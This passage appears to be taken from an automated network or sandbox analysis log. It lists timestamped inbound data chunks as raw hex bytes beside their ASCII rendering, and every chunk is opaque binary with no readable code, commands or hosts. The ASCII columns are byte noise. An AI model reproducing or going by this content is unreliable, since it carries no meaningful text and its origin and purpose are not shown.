c1 2a 87 dd 58 9d 28 76 e3 48 26 e5 11 11 85 2f 50 1e 69 32 ac 2e 3d ea 3d c5 42 8f f2 4f 3d d2 Data Ascii: h'M^P6SQKdQF,Ow(:?!ueje2e mxS]R)@GR@$g&{@\%tF`}-`f#Qkh'\|~GfJjHkp>^%\cQSDGZ%~,79V\|@OVH*X(vH&/Pi2.==BO=
2023-11-18 09:02:40 UTC	4771	IN	Data Raw: 58 8c 86 0b f0 af 49 91 62 d4 5c 30 2b f7 80 d0 70 55 fb 51 1e a0 46 dd 05 57 e5 c2 36 da 55 80 b8 9a 5e f4 8d 2c fc d8 cb 5a dd a8 a5 00 ca 1a fe 1f 42 11 ae f0 9b 5f ff dc 0a 45 06 bf 47 71 f8 7b 80 e4 20 72 d8 85 5a aa e2 2b 19 f7 41 84 54 79 69 79 bd 5e 0a c7 5e 3d bf 1c 2c 10 f7 f7 5e 09 16 8d 24 63 3f e9 20 f9 fb 1f 5b 21 73 30 f7 aa 02 c7 09 59 f8 3d 45 f6 e4 4a 31 da 5d 30 2b 4c 89 91 86 04 61 e4 a3 f8 35 b2 f0 79 56 1a 1c 23 0b 9f 63 ac 2f c8 c4 59 12 ce e7 28 47 75 bc 14 34 c2 05 6f 3c e4 49 35 69 a4 56 e1 f4 10 3d b5 51 73 01 d4 14 8a cb 69 a4 56 1d 07 55 ac 7f 7e 6c 85 86 0b 96 a7 9e 91 39 1a 54 45 99 25 40 fe 1e 47 5b 8f 2f 46 ae aa 31 38 5d 71 38 38 dd 85 7b 13 4e fa e9 60 b7 bf 1a c8 59 1a 16 23 71 9c 2f 3a b8 fc f1 b1 15 92 0c aa 32 ec 90 Data Ascii: XIb\0+pUQFW6U^,ZB_EGq{ rZ+ATyiy^^=,^$c? [!s0Y=EJ1]0+La5yV#c/Y(Gu4o<I5iV=QsiVU~l9TE%@G[/F18]q88{N`Y#q/:2
2023-11-18 09:02:40 UTC	4787	IN	Data Raw: 90 1e d7 27 1d 4c a8 f0 b8 7c ff 73 4a 62 eb cf e9 93 6a b3 62 a6 85 93 be eb 2b 09 ee fa 56 14 ed d7 ac 8c 15 9a 6c a1 96 1e 1f 94 6a e9 3d 64 0b 62 03 ca eb 78 fe c1 63 69 85 73 44 89 d1 8e af 81 72 ba 2b ca 62 f0 f5 59 2c 8b e1 64 3b b1 04 4a 1d db 6d c5 fc d0 07 ca a1 7a af 14 a0 54 de 7b a5 00 51 c2 9a e5 ee 41 7a 4b f6 aa e6 b9 40 54 1e f6 2b fe cf b7 ec 57 2b aa 95 d7 50 5b 8f 16 2d 51 7e c9 77 57 2d 51 9c ac 34 73 a0 94 38 ef aa 29 0b 44 46 eb e1 06 b4 c9 68 db 8f a5 ee 2a 0f 79 f5 95 fa 5c 5a 90 cf d5 76 19 81 06 19 6d 7f e5 88 9f a2 13 fb 76 7e 20 0f 73 33 9c 6c 36 e4 40 1c aa 6f e8 97 fa b1 38 e9 1b fa f4 8c 2e f5 63 b1 6d 2d d3 1b 68 24 a3 1b 6b 1c 6d 4a 8c aa 65 01 44 09 4f 91 ce 08 3a 47 dc 21 6f eb db a8 40 17 19 be b6 e7 de 27 d0 4e 86 b5 Data Ascii: 'L\|sJbjb+Vlj=dbxcisDr+bY,d;JmzT{QAzK@T+W+P[-Q~wW-Q4s8)DFh*y\Zvmv~ s3l6@o8.cm-h$kmJeDO:G!o@'N
2023-11-18 09:02:40 UTC	4803	IN	Data Raw: 20 15 0a 7b a5 54 28 cd 0e 61 73 12 1d f5 60 20 25 f1 0f 1f 21 e8 98 ed 64 ba 15 47 f1 0f ce d7 76 d5 92 78 19 77 77 3f 87 a5 88 a3 a3 f8 3f 26 ce 2c 63 41 9e 3a b3 6c 73 3e 2a c4 1d 28 9a 3a 76 bd c4 a7 c4 51 23 23 a3 01 81 36 19 19 0d 08 c4 a6 b2 1e 7d 20 4a f8 9e 93 e3 50 9d 9f 4b ae 3c a1 07 8a 49 3c 7e 13 87 43 27 20 34 65 a6 72 ce ae a3 1e 0c 3f cb c0 71 02 90 18 47 75 4c da 52 78 b6 91 43 29 a2 81 5a 30 3c d8 3a 06 b8 14 6c dd 16 62 aa a5 43 bb d4 55 cb f9 18 e2 42 b6 5c 3d 47 be 9a b6 4b 6b 9c 32 57 8e 62 80 d3 cd c1 b0 90 1d 45 af e6 54 e5 de 40 94 b0 7f 3d 25 a6 a6 c4 5d 52 8a 04 b7 32 cb 9d 3f f8 35 70 14 3a 50 c7 84 4d a9 8e c9 25 dd ea fb 85 0c 59 7d eb d8 19 8d 24 cc 81 ee 4b 86 1d 85 c5 1e c7 51 4c a2 1f fc a4 04 1d fe 9a 45 73 a6 45 e6 08 Data Ascii: {T(as` %!dGvxww??&,cA:ls>*(:vQ##6} JPK<I<~C' 4er?qGuLRxC)Z0<:lbCUB\=GKk2WbET@=%]R2?5p:PM%Y}$KQLEsE
2023-11-18 09:02:40 UTC	4819	IN	Data Raw: eb 23 c4 1a f0 36 fc 62 53 5d b3 e8 49 ca 2c 1d 43 53 df c9 bd cc d1 ce dc cb 2e c2 45 90 4b 6a 0f 17 41 17 fd a6 32 9b 0a 4f 40 bf 73 76 db 82 9a 1a e1 09 e8 62 53 b6 82 40 a1 63 f8 35 80 74 38 0a 1d 03 8c 40 7c 57 a3 6b 66 18 6e f3 d6 6b 1f 83 7b 9f f7 35 df 79 50 74 c4 df 79 a4 5f 5f 20 2a 87 41 88 ef 6a 2c fd ce 63 eb 2e 35 10 7b 05 63 0d a8 b4 02 45 af e6 d5 48 3a 12 28 7a 75 52 2c b3 bb 4c b1 0c d1 b7 ce 7f a9 80 5b e7 db 93 2a e7 dc ce 14 cb 2e fa 71 fb 64 90 0c b4 59 30 48 79 14 88 3a fc 34 aa e1 33 1f 6d d5 e6 90 d7 4b 20 ea 48 ee 9d 40 d4 e1 e7 8c 7c 8e a9 6d d4 9c 4a 13 15 88 af 64 f5 56 9e 7c 75 8e f6 09 bf 3e d5 58 da 5f cd dd cb 6f 30 c3 af 0f a2 0d 99 90 6e 26 97 76 11 5e 7a 5c 9d a7 69 b7 74 72 48 7f a7 0e 19 84 ee 93 43 9a 93 fe 92 dd e7 Data Ascii: #6bS]I,CS.EKjA2O@svbS@c5t8@\|Wkfnk{5yPty__ Aj,c.5{cEH:(zuR,L[.qdY0Hy:43mK H@\|mJdV\|u>X_o0n&v^z\itrHC
2023-11-18 09:02:40 UTC	4851	IN	Data Raw: 9c f1 5b e8 e8 f4 03 b8 e2 88 80 55 a0 49 1d 33 92 4b 3b a2 8e 94 c8 c8 d1 eb a0 73 7f 52 b9 b8 3f af 58 82 37 ca d1 ab 2a 73 7f 3a 62 55 fd a4 79 25 8a 4f f3 61 b7 f3 92 1f de 8b 23 8a cf 2b e2 72 92 bf f9 e0 e5 e4 15 77 50 24 38 7a 3a 66 4a 3f 06 c4 9f 76 e2 ce 8b ca 27 ef bc ae 98 2e aa 1c b1 2a dc fc a8 04 6f 7e ae 88 eb 1a 2a 17 d1 e5 30 df cd 19 d3 67 2e 7d 26 9c 9d 92 bf 87 d8 29 c7 cb fc 2e e5 bc ff 18 2f 5d 3b 75 28 5d fb 78 e9 da fd da 69 44 ba f6 c1 74 ed 7f 7e 09 75 3e 40 ba f6 6f 3e 68 9c 0c 9e 63 fd 77 ea e0 85 c2 15 71 0b c0 7e 2c de 02 5c 31 1d 79 03 71 32 2c 9c 53 73 fa 2c 9e 53 8f 97 31 5d 55 2d cd 44 cb 78 1e 43 a2 fc e7 e3 65 33 57 cf 79 86 6c 89 fa 86 38 b6 1c bd 21 f1 84 e2 fc 08 2b a1 f8 15 7b 9e 89 bb 6b 26 ee 11 d9 a0 1c b1 04 ce Data Ascii: [UI3K;sR?X7s:bUy%Oa#+rwP$8z:fJ?v'.o~*0g.}&)./];u(]xiDt~u>@o>hcwq~,\1yq2,Ss,S1]U-DxCe3Wyl8!+{k&
2023-11-18 09:02:40 UTC	4867	IN	Data Raw: 7b 39 89 6d 73 d3 37 7f dc a3 87 5f f3 c7 e5 c8 9b c5 40 d5 5c b5 cd d3 c0 72 59 cf 5c 25 2d 2c 39 40 2a fb 69 a0 a8 d1 df 25 a5 25 a0 e8 55 b7 d7 65 8a 83 40 ac 81 db 04 79 74 dd 26 1e 72 d5 dc e1 7a a8 9d 40 2a ce 44 a0 18 60 cf 04 59 8e 42 fc b0 57 9b eb e7 ec ba 66 3c d7 eb d6 72 e4 7d f2 69 f2 b9 56 28 19 7e 20 67 6e 6b 84 06 02 9e 7a 24 26 71 ec cc 6c 1d 68 46 41 66 b6 0e 54 59 20 c7 db 40 3d 0a 36 dc 68 ff 8e 82 7d c4 1c 39 46 54 e3 f0 21 fe 21 7b 3b c9 3c 72 8c 80 9c 29 3a 03 45 af 4e df 45 23 07 62 81 e7 90 fe 78 09 6d 16 20 ac d2 5f 2c a0 70 37 4e 9a e3 07 aa 2c 50 34 92 40 d1 5d cf c4 1f 8b 7a 1c dd 52 87 27 dc 57 8d c5 23 15 01 4f 0e 45 1c 04 3c 21 f3 2d b7 9b 40 64 8e 7b ad 78 e8 5e 6b 7e 13 f9 1c 0d e4 cc 9f 2f d9 bb 1e 9d 80 76 14 94 eb e4 Data Ascii: {9ms7_@\rY\%-,9@i%%Ue@yt&rz@D`YBWf<r}iV(~ gnkz$&qlhFAfTY @=6h}9FT!!{;<r):ENE#bxm _,p7N,P4@]zR'W#OE<!-@d{x^k~/v
2023-11-18 09:02:40 UTC	4883	IN	Data Raw: 92 9a 58 3c d5 5d 1c 10 26 ae 3c 02 74 31 92 0e 38 91 e5 9b 80 13 f9 13 05 f6 7c 38 4b 86 08 3b 2d 10 cc 16 80 f8 40 0e 51 24 20 d8 2c 3f 45 43 14 09 08 1d d3 9d 6a a0 97 3a 40 d8 29 e5 24 ec 1c a3 12 76 3a da 2c b0 63 46 d8 fa 86 08 3b 2d 42 ec d1 0d 05 43 af c6 01 47 95 94 cb 51 35 3e 85 61 dc 11 95 af 23 ca 0a 47 54 5e b8 3f 81 e2 ad 1d 2f 6c 00 7c 56 af 6c 00 ee 6a 90 f2 97 c1 f5 03 49 79 b3 46 63 b8 31 8c 11 39 13 81 5e 16 ec 9e 8f a4 e9 04 79 b7 86 af 42 cc 1d 75 16 94 c5 12 28 46 de 7b 12 4a 01 f1 ff e8 38 b1 50 79 d7 89 c5 c8 7e 14 5b eb 28 7a 85 50 eb 6c 8a b1 9c 36 c7 8a 7b 19 28 6a 0c f7 15 c5 38 86 7c 45 e6 4b 53 aa 68 a4 32 e6 3f 38 e0 cd a0 8e 21 6f c6 18 e0 42 52 0d 72 21 99 58 bc 19 40 54 5e f2 79 01 71 e4 63 b5 da 2b f9 26 ae b2 a4 1d 73 Data Ascii: X<]&<t18\|8K;-@Q$ ,?ECj:@)$v:,cF;-BCGQ5>a#GT^?/l\|VljIyFc19^yBu(F{J8Py~[(zPl6{(j8\|EKSh2?8!oBRr!X@T^yqc+&s
2023-11-18 09:02:40 UTC	4899	IN	Data Raw: e7 01 b2 0a 1f c8 e7 d9 ba cb aa d3 20 c3 72 a7 17 15 48 3a fa be 32 dc dd 2b c3 1d f1 7c d5 14 33 47 82 74 71 69 a0 ae 4f f4 46 dd 3e 0f 70 4c cd 8f 7b ee 8b cc 3d bd c8 dc 61 8e 2a 09 ba dc 04 b9 7a db 24 18 83 15 5e d2 c7 b6 b9 03 12 a3 5d b5 c5 01 ea 62 d8 9c 40 74 89 31 fa d6 54 d3 76 f0 49 67 3c 37 d5 0f 2b 87 33 9e 25 ba e7 79 8b 14 b1 25 31 0e 2d 7d 6d d8 ce 40 a4 a6 e0 a5 87 7d 3b 91 9b 9a b5 93 09 a4 19 d5 90 cf f2 bb 18 cc 67 09 32 16 99 af d2 31 bd c8 84 8b 1f 2f 91 88 a4 7c 9d f5 1f 0c a4 55 b4 c1 a7 e8 b7 5f 1f 23 e9 80 4f 91 56 6a b9 08 82 74 9c 57 8f b2 6b a7 be 92 e7 e8 b5 2f 01 62 53 0f 2a e4 e9 59 3d a7 b6 9c cf 73 db 32 41 a4 a6 90 16 c3 4d 35 6d ee 9e a7 d9 00 41 c4 5e a1 18 b6 bb fb b0 de dd 4b f6 3b 8c 80 ff f9 f7 63 c4 5e 8d 2a a3 Data Ascii: rH:2+\|3GtqiOF>pL{=az$^]b@t1TvIg<7+3%y%1-}m@};g21/\|U_#OVjtWk/bSY=s2AM5mA^K;c^*
2023-11-18 09:02:40 UTC	4906	IN	Data Raw: 4e 3d b5 91 c8 dd ff 85 05 3c c9 1c 32 c3 a7 39 8a e6 f6 4b 81 ed a8 b0 a0 c9 7b d9 11 65 64 2e d3 40 6c 2e 34 a9 12 4e 4d aa 91 63 e5 6f d0 69 dd 66 e4 6e b9 58 76 fa 34 1c b2 cf 6b 10 15 69 ca c8 3d ae 56 d1 75 e1 90 99 b7 2f 90 0a 66 cf b9 db 69 0f 57 cd 1f fb fa 0d 3a 7d 1a ce 12 71 a9 71 1d 2d 16 a4 65 bf a3 c6 82 34 88 75 c4 aa 4a de 9d 1d 15 16 5c 1b e4 c3 3c 58 20 d3 b2 df 11 65 5c f6 70 40 9c 0c 48 fc ca 4d 18 88 1c ed ba 41 3e cc 9c 05 32 c3 a7 39 62 ab ae b8 ce 6e 64 41 19 d0 3a 4b c6 d2 d2 37 56 b9 7b 4e ad b3 3d c3 66 28 78 47 2c 80 07 68 7c 0f a0 c2 02 fb 9d e3 c8 09 b4 a2 e0 b2 fd a8 ca 02 0e 32 d5 86 b8 6b 47 ab 9a bb 35 4b 38 dd 9a eb 9d 05 3c 90 0a d2 f6 c3 51 08 6f 35 a3 a4 19 e2 d1 b9 dd fe ce 8e 06 0b 32 f2 b0 23 56 05 15 92 aa a2 0a Data Ascii: N=<29K{ed.@l.4NMcoifnXv4ki=Vu/fiW:}qq-e4uJ\<X e\p@HMA>29bndA:K7V{N=f(xG,h\|2kG5K8<Qo52#V
2023-11-18 09:02:40 UTC	4938	IN	Data Raw: 32 12 07 dc 49 a8 db 3f 74 27 01 71 c8 42 9a 48 45 e1 18 5e 39 e6 74 51 a5 79 06 a4 c1 f0 81 13 4a ae 38 40 ac 6e 6b 0e 15 4d 44 8e fe 39 96 22 a0 a6 04 38 23 f8 fe 32 72 8e cb 7b ea 44 ac 55 6f a5 59 93 68 2a c1 21 9c 88 54 14 cc 3c d4 89 5d 66 1e 8f 88 e3 eb 97 bf 5f 42 6a e0 f3 e7 f7 a3 ba 7d 6a 50 77 9c 6b bf b2 af ba ce b5 21 c6 4d 91 fe 8f 40 aa 15 0e bc 6e 87 0e bc 21 4e eb dc 01 69 24 76 38 8e 53 ef f6 a9 e5 ee 11 6f 2b 73 27 12 39 ce ce ea f6 ae b3 73 88 b1 78 fd 50 51 f7 ed de 5d 8e b4 91 48 93 4c 87 b7 b7 54 2a 4c 44 f2 51 5e fe 89 92 bc 7d a0 3b c8 c9 32 10 db f1 88 f5 26 9c a8 31 a1 db da 89 48 45 0d 3b 2a 23 9a 4a b0 7f 51 22 15 05 a5 c2 ca a1 e5 ae 65 b8 44 f6 55 53 b8 44 88 71 24 73 51 52 37 0e d1 8e 47 89 c4 71 ad 1a 57 76 e3 13 62 d8 54 Data Ascii: 2I?t'qBHE^9tQyJ8@nkMD9"8#2r{DUoYh!T<]f_Bj}jPwk!M@n!Ni$v8So+s'9sxPQ]HLTLDQ^};2&1HE;*#JQ"eDUSDq$sQR7GqWvbT
2023-11-18 09:02:40 UTC	4954	IN	Data Raw: 25 6b 38 48 28 fb cd 21 a3 f7 bc a2 b0 ad 66 ee c2 b6 20 cb b6 1d 48 c2 11 80 aa 5b 1f 91 84 c3 71 c9 cf 0a bb ab 84 d3 b6 fd 4b be 1f 43 b6 6d 90 50 27 f8 91 c8 b6 fd 92 b4 6d 6b 43 1e b2 6d 83 5c 9f fa 69 81 24 1c 8e 00 35 0f 05 1c 81 5c f5 69 49 24 e1 b0 fd fa e5 1c b2 6d 83 84 3a 21 75 19 44 29 7c c2 78 67 19 53 b6 6d 90 95 df 27 d0 ad 86 e5 2c 82 44 5a 70 54 09 59 f8 94 6d 1b e4 6e 2b 91 17 c2 6c a0 6d db 32 64 db 06 49 db b6 64 c8 b6 fd 92 b4 6d 6b e6 53 b6 6d 90 bb 6d 64 53 26 ec 89 2d bb 6d 64 53 f1 51 13 39 c0 da d3 9d b7 4f 83 c9 f8 28 dd 96 a6 e2 a3 e6 85 83 b3 71 c8 b6 0d b2 3c e2 03 49 38 0d d2 f9 c5 42 a4 ae 68 90 76 57 32 48 4f 06 e4 b6 09 2a 1b 22 c8 32 48 07 52 57 bb 92 5c 04 92 70 da 9d ff a9 79 c8 ee 3c af 15 c5 73 53 c6 92 dd 19 e4 55 Data Ascii: %k8H(!f H[qKCmP'mkCm\i$5\iI$m:!uD)\|xgSm',DZpTYmn+lm2dIdmkSmmdS&-mdSQ9O(q<I8BhvW2HO*"2HRW\py<sSU
2023-11-18 09:02:40 UTC	4986	IN	Data Raw: bd 32 8f 78 9f 33 dc ba 3d c3 2d 78 c9 a4 63 c9 4b 16 93 4a 3f 9e 7c c9 20 f4 88 b8 2f aa 49 7f 75 cf 57 0b 57 36 5d 43 57 36 e3 0a 52 4c 4b ee d5 f4 b4 44 8f c9 37 d5 f0 51 e6 39 11 8f bb 3e 86 b5 3c fb ac 7d 4e 32 6b 7b 92 21 71 b5 6a 98 b8 3a c4 79 6c 3f f6 c7 73 c9 3e 58 3c 88 d4 d4 55 54 f0 40 1a f6 1d bb 86 aa d1 bc d0 6f e4 76 d2 03 6e e5 76 7a 44 90 69 ba 46 f7 0e 60 93 de e3 d7 cb 28 df c7 3e e8 3d 80 f4 3e 36 52 38 b9 29 a5 70 7a c4 b9 8e ff 23 90 74 ac 73 f6 d9 cb b3 cf 8e c0 d6 ea ee f2 ec b3 57 c5 86 13 e9 39 62 7f 5e 4d 6d 6f 52 f7 c1 2d 42 c4 1a fd 1d 3b 61 6d 9d 03 e5 ab 7d c4 56 f3 2e d0 50 c1 a8 f5 1c e8 52 c1 76 1c 3d d1 ca 02 66 26 fd f1 32 92 72 b0 91 b8 86 d8 48 42 8c bd 8f 7b 25 36 92 10 a7 af 21 02 5d ea 6e ec a3 aa 29 a5 13 0d 71 Data Ascii: 2x3=-xcKJ?\| /IuWW6]CW6RLKD7Q9><}N2k{!qj:yl?s>X<UT@ovnvzDiF`(>=>6R8)pz#tsW9b^MmoR-B;am}V.PRv=f&2rHB{%6!]n)q
2023-11-18 09:02:40 UTC	5002	IN	Data Raw: 56 ad 7a 25 13 62 41 aa f4 54 15 55 7a 20 a1 d2 e3 dc 5d 54 e9 81 5c c7 bc 5a b4 80 08 72 74 dc 3f 7e 5c 46 e0 88 28 55 b7 e7 55 a2 a2 82 3a 74 a9 2e f2 a8 4a 32 0c 4f f2 58 9b 48 55 d9 a5 52 68 b0 c0 0e 92 44 39 45 5f 32 43 e6 fd ba 8c 24 c3 39 78 84 54 15 ae 19 5f 55 95 ae 19 61 ee 19 cf 4e b9 c8 24 1a 2c 98 fb c0 92 88 1c b7 03 a8 0a a5 f0 5e 8e 73 22 50 7e c1 97 8c 03 9d ab 2a 75 49 78 e9 fb 52 9d a8 b0 00 1a 61 36 17 88 ad 2a ce 7c 22 c4 aa ea 67 5f b0 12 b1 55 15 21 c1 72 ee 26 2a 2a c0 99 e1 7f 2f 23 73 74 2f af 89 24 03 21 c1 72 fa 00 35 76 b0 22 3e 43 6e 5e 89 d8 dc b0 e5 5e 1e dd b0 e5 16 47 9d f3 68 6e 9d 1a c4 8a 68 56 b9 fa 24 92 f0 7e 8f 83 a3 f3 cc f0 92 e3 66 a4 42 21 75 30 1c 6c 79 02 48 a4 56 41 7f 65 19 d2 5f 95 30 6d 1c 75 73 48 7f f5 Data Ascii: Vz%bATUz ]T\Zrt?~\F(UU:t.J2OXHURhD9E_2C$9xT_UaN$,^s"P~uIxRa6\|"g_U!r&**/#st/$!r5v">Cn^^GhnhV$~fB!u0lyHVAe_0musH
2023-11-18 09:02:40 UTC	5018	IN	Data Raw: c6 40 57 32 b6 99 38 9d ec 09 24 d7 f6 30 34 06 92 8e 8e 07 1f fe 70 42 ea 55 e7 ad 4c 4a e8 56 e6 25 51 8a d0 ab 68 20 8d 1c 79 91 72 5e 11 49 c7 a8 d0 37 a1 61 46 db 1e c9 50 75 2e 90 cf 53 f3 6a 3a a1 2d 48 a6 a7 75 af 9c 9e 96 16 f9 59 13 6e ba c6 21 48 da 7d 7e d1 00 1f db 7d 10 3e 5e 56 b5 40 d2 31 47 7d 84 03 c5 38 de cf d5 aa 5e 11 85 c4 ea db 35 47 a0 21 06 0b b5 7c f9 f5 93 48 12 ac bb 92 12 8f 52 f3 93 ac e3 52 20 35 f5 ec d3 07 19 09 35 77 d7 3c b6 d9 4e 34 cc c0 7a c5 2b 3a 21 2a 47 91 87 74 11 14 9a 62 6c f3 8a 28 fe f3 7e f4 2a e2 28 a4 a6 fa 9d 37 ee 42 6a 6a f4 3a 41 02 85 d3 14 c9 e9 62 17 40 e3 b6 c4 ac ac f2 42 d2 b1 f8 9e ff 22 c6 f2 7b de 51 66 b2 24 88 2e 33 6a eb 1c 48 12 91 f7 dc 12 ce 49 fe 1e e0 cf 72 69 16 ba c4 28 cf 01 21 49 Data Ascii: @W28$04pBULJV%Qh yr^I7aFPu.Sj:-HuYn!H}~}>^V@1G}8^5G!\|HRR 55w<N4z+:!Gtbl(~(7Bjj:Ab@B"{Qf$.3jHIri(!I
2023-11-18 09:02:40 UTC	5034	IN	Data Raw: a1 09 24 fd 96 c2 71 fa af c5 43 24 76 43 14 b2 f0 eb 13 1d ae 90 ab 82 46 bf 38 46 fa 51 e9 a1 c2 21 9f 22 90 33 fe 25 42 e6 58 fe 3e 42 92 b1 5d 4e 0a 89 a3 ae 1a bf b8 20 cb eb 79 6c c7 d7 42 12 7e f0 94 aa 61 07 d2 7f 7e d6 8d 62 aa d2 8d e2 43 6e 77 13 42 25 e3 fa d0 58 43 27 04 a1 6a d5 f5 2c c0 d1 e1 0a 5d 2e b8 de 69 15 d1 70 c1 c8 d9 a0 50 57 c1 66 ac 21 d2 56 74 b5 ed c4 52 c8 c2 8f cf b5 c9 50 1a 06 90 cc 84 10 0e 65 42 40 cc 37 5f bb b1 f0 f3 e3 e9 73 55 46 52 73 38 23 29 48 9c e2 23 e3 ec 9e 0c 48 48 bb b5 ea ec 69 d5 79 ee ad 3a cf b4 ea 64 3e b2 70 28 1f 19 c8 2b d7 1c 42 e6 b8 e3 c5 2a f4 1f a6 ae 24 d9 82 db 46 ee ff 69 aa 38 73 29 3b a2 db 6a 4b b2 a2 ad f6 fd 8f d2 85 44 26 80 78 1b 64 30 40 90 2c 3e 0e 20 06 c9 d8 bb 15 8e ad 33 c3 9a Data Ascii: $qC$vCF8FQ!"3%BX>B]N ylB~a~bCnwB%XC'j,].ipPWf!VtRPeB@7_sUFRs8#)H#HHiy:d>p(+B*$Fi8s);jKD&xd0@,> 3
2023-11-18 09:02:40 UTC	5066	IN	Data Raw: 4e dc 92 a9 1d 43 56 b5 8f 74 ab da 5f d8 25 43 56 35 f3 fc 9b 7c c7 22 04 1d eb 1b 18 61 35 00 5a 62 ec 29 b3 3a 90 b7 a3 ad e6 71 d5 20 e1 08 df 63 7e 1b f8 13 76 51 a0 43 c6 3c 61 1d 04 6a 64 ac 34 59 4c c5 f7 71 d2 4d 48 98 db 81 54 d4 be a1 dc 51 28 bf 23 0e 0d 53 81 7f 40 a6 c9 1b 88 ca cf 73 6f d6 ca 90 18 6f 0b 7b 22 10 95 23 22 50 48 4c de 66 4c 0b bd 52 74 9c f5 86 0e 33 d7 a6 c4 e2 28 99 36 4f f7 6c f9 d9 bc 05 98 0c fc 23 09 ba 9e 82 9c f4 87 13 92 c4 9c 71 3e 07 1a 64 ac 3e b3 56 86 58 2b 8f 3b 92 12 70 e6 76 f2 28 74 2c d0 50 03 6f e4 3f 17 92 8e 7b 4b 3b ae 8c 67 96 a4 23 2d c2 40 8d 0c 3f fc 50 02 0f e9 c9 18 b9 2f 01 92 44 b9 89 03 1a 64 ac 27 fb ca d0 51 51 fe a0 22 24 56 8f 5a ed 34 fc 02 05 23 0d bf 40 52 7e f4 ac 59 e8 90 71 d3 58 03 Data Ascii: NCVt_%CV5\|"a5Zb):q c~vQC<ajd4YLqMHTQ(#S@soo{"#"PHLfLRt3(6Ol#q>d>VX+;pv(t,Po?{K;g#-@?P/Dd'QQ"$VZ4#@R~YqX
2023-11-18 09:02:40 UTC	5082	IN	Data Raw: 4c 9f c8 e6 44 74 98 e4 98 b9 26 4e 58 a4 14 c7 f2 4c 64 54 c7 e4 f8 46 0e 3b fc 58 92 c3 7e 2c 87 0c 1f fb e2 d8 3e 78 4d 1a 73 9b 23 8d b9 83 7c af 79 95 c6 dc 41 ee ba 8c 02 a9 83 5f 25 db 13 b2 8c a7 b7 4b c6 93 0b f2 6d fe 0d e4 d1 fd 9e 7d 8d ee 67 b7 9b 43 b6 7b a5 fe 5a ae d4 5f bb 57 ea 2f 75 19 f3 83 d3 78 72 d8 69 fc 90 30 eb 49 0e 9b f5 04 f9 7d 17 c7 c8 25 fc bb 7c 7e 88 dc f3 38 b8 17 c7 cc 25 3c 32 53 5e 1c df 9b 63 15 c7 be e2 b0 19 fb 21 91 4d 30 39 56 2e fa b7 19 3b 91 ab 8a 13 cb c5 91 8b fe 07 2b a4 e4 b0 15 52 90 ef 3d 56 b6 9a 0c 72 3e 57 cf ed 6b 19 e4 bd 7f 7c 3b f7 8f d3 be 6b 74 03 89 63 3d f7 6e b0 9e dc 0d d6 5b f6 25 44 e6 78 f7 f5 0f ae d4 14 cd 35 ee 95 7a 8d 5c a9 d7 18 d7 7a b5 86 d5 09 f0 a8 dc 17 c7 e7 0e ae 79 af ed 6b Data Ascii: LDt&NXLdTF;X~,>xMs#\|yA_%Km}gC{Z_W/uxri0I}%\|~8%<2S^c!M09V.;+R=Vr>Wk\|;ktc=n[%Dx5z\zyk
2023-11-18 09:02:40 UTC	5098	IN	Data Raw: 32 44 0b c1 d9 57 4f 5c d1 ef c9 15 c1 6c 8c 58 22 2f 7f b5 73 86 2c 52 19 66 2e a9 87 c1 69 22 a8 d8 b8 22 7d b6 ed fc 7f cd e1 44 64 35 8e f9 ae 88 ac d6 ce e8 17 90 f7 d5 fe 6a f1 23 0d 91 57 77 5b 3c f3 ec 44 27 75 e2 be 6e ad b6 7f fb 24 75 04 be b7 ad 8f 97 a8 49 d0 dd 5d ec 47 04 1d 77 31 4b 5a 60 df d4 30 42 43 e6 68 0f b1 03 a1 21 ab f3 ff fc f1 49 a2 ba 3a c9 9a 1a 9c 64 b5 a4 2f 46 a3 f0 30 15 5b d2 27 f4 a9 11 13 fa cd 11 57 37 92 43 51 2b 33 f0 96 c6 e2 fb 61 49 fb 4c 64 19 8b cf 84 25 cd 34 f9 c7 df 3e 49 91 95 8d 71 d9 f2 11 d3 8f f7 ff f7 8a bb 33 21 34 2c 10 5f 95 11 61 f9 2c d9 32 72 3d 94 02 77 b3 fa bf 4f 52 64 25 8b 17 bf e0 c4 e2 65 49 0f 60 94 59 11 c0 c8 93 36 96 b8 e9 1e 8a ac dc 8b 35 35 f0 62 f5 a4 59 3f 52 03 eb 87 25 3d 96 45 Data Ascii: 2DWO\lX"/s,Rf.i""}Dd5j#Ww[<D'un$uI]Gw1KZ`0BCh!I:d/F0['W7CQ+3aILd%4>Iq3!4,_a,2r=wORd%eI`Y655bY?R%=E
2023-11-18 09:02:40 UTC	5114	IN	Data Raw: 94 78 2d c8 99 9e 2f 42 12 ce 40 1a 9c 1f 77 06 d2 18 b7 62 40 70 1a dc 19 03 22 0e 0f 3d 7d 65 88 a6 5a b5 6a be 22 0b b1 aa 72 c1 37 9c db 04 51 53 01 62 dd 7f 77 81 62 dd 8f f0 9a 49 f3 0b 21 17 20 ec 98 7e 12 20 c9 b8 67 be c4 09 b1 b9 08 75 ef 43 2a 90 06 f5 be 3e b4 9a 3f 22 90 aa e2 81 5e e3 aa e4 81 fe 2e 61 fd 93 1d 05 24 19 61 e9 28 f3 6f 20 1d 6b ef 42 17 25 8d 92 62 17 a5 e8 ef 50 09 a7 0c a7 e0 08 b2 d7 95 e3 0a 48 05 61 8b 91 13 07 48 3f c9 7a ce 62 49 24 19 4c ab fd cd 1c 8a fc 05 8b d2 35 de 38 94 0b 7b 44 8c fe db fa 76 22 8d f6 7d a3 aa b9 d1 13 b1 55 7b ed 08 b3 05 8d 2b a0 a6 02 1e 26 fe 7d 25 92 8c 32 de 66 2d 90 ab 82 19 a2 c6 2e f2 57 4b 78 2d 19 ef 55 88 5f 5e 1b 34 f4 ea 5a 20 c9 78 4b fa 24 a4 56 75 7a 5a 7c 79 19 69 ec d6 48 2b Data Ascii: x-/B@wb@p"=}eZj"r7QSbwbI! ~ guC*>?"^.a$a(o kB%bPHaH?zbI$L58{Dv"}U{+&}%2f-.WKx-U_^4Z xK$VuzZ\|yiH+
